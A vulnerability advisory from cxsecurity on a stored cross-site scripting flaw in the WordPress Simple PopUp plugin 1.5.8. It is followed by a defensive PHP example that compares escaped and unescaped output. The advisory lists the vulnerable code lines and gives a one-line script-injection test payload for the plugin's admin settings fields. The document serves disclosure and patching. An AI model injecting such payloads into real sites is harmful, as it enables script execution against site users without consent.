WordPress 1.5.8 Simple PopUp Plugin Cross Site Scripting

2015.08.19
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

######################
# Exploit Title : WordPress Simple PopUp Plugin Cross Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/simple-popup/
# Date : 2015-08-18
# Tested On : Windows - Firefox
# Software Link : https://downloads.wordpress.org/plugin/simple-popup.zip
# Version : 1.5.8
######################
# Vulnerable File : sp-options.php (WordPress SimplePop Options)
######################
# Vulnerable Code :

19: register_setting( 'sp-settings-group', 'popup_box_delay' );
22: register_setting( 'sp-settings-group', 'popup_box_rounded_corner');
48: <input type="text" name="popup_box_delay" value="<?php echo htmlspecialchars(get_option('popup_box_delay')); ?>" />
72: <input type="text" name="popup_box_rounded_corner" value="<?php echo get_option('popup_box_rounded_corner'); ?>" />

######################
# Exploit :

To test for cross-site scripting, use this code in all of the above inputs.

Address of WordPress SimplePop Options : http://localhost/wordpress/wp-admin/admin.php?page=simple-popup%2Fsp-options.php

"><script>alert(/xss/)</script>

######################
# Patch :

To fix this vulnerability, use the htmlspecialchars() function.

48: <input type="text" name="popup_box_delay" value="<?php echo htmlspecialchars(get_option('popup_box_delay')); ?>" />
72: <input type="text" name="popup_box_rounded_corner" value="<?php echo htmlspecialchars(get_option('popup_box_rounded_corner')); ?>" />

######################
# Discovered By : Ehsan Hosseini.
######################
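The patch above as an added example (not the plugin's code and not part of the original advisory): a stand-alone PHP script that renders the field from line 72 with and without escaping, then parses the markup to count injected script elements. The `$stored` array standing in for `get_option()`, the helper names, and the numeric bounds in `sanitize_int_option()` are assumptions.

```php
<?php
// Added example. $stored is a constructed stand-in for the WordPress option store.
$stored = [
    'popup_box_delay'          => '1500',
    'popup_box_rounded_corner' => '"><script>alert(/xss/)</script>', // test string from the advisory
];

// Line 72 as listed under "Vulnerable Code": the value is echoed without escaping.
function render_raw(string $name, string $value): string {
    return '<input type="text" name="' . $name . '" value="' . $value . '" />';
}

// Patched form: escape for an HTML attribute context. ENT_QUOTES is passed
// explicitly because PHP < 8.1 does not escape single quotes by default.
function render_escaped(string $name, string $value): string {
    $safe = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $name . '" value="' . $safe . '" />';
}

// Save-time validation as defense in depth. Assumption: both options are
// bounded integers; anything else is replaced by the default.
function sanitize_int_option($raw, int $default, int $min, int $max): int {
    $v = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => $min, 'max_range' => $max]]);
    return $v === false ? $default : $v;
}

// Regression check: parse the rendered field the way a browser would.
function inspect(string $html): array {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true); // tolerate fragment markup
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();
    $input = $doc->getElementsByTagName('input')->item(0);
    return [
        'scripts' => $doc->getElementsByTagName('script')->length,
        'value'   => $input ? $input->getAttribute('value') : null,
    ];
}

foreach ($stored as $name => $value) {
    $raw = inspect(render_raw($name, $value));
    $esc = inspect(render_escaped($name, $value));
    printf("%s\n  raw:     scripts=%d value=%s\n  escaped: scripts=%d value=%s\n  saved as: %d\n",
        $name, $raw['scripts'], var_export($raw['value'], true),
        $esc['scripts'], var_export($esc['value'], true),
        sanitize_int_option($value, 0, 0, 60000));
}
```

In WordPress code, `esc_attr()` is the usual way to escape a value placed inside an HTML attribute.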



Copyright 2024, cxsecurity.com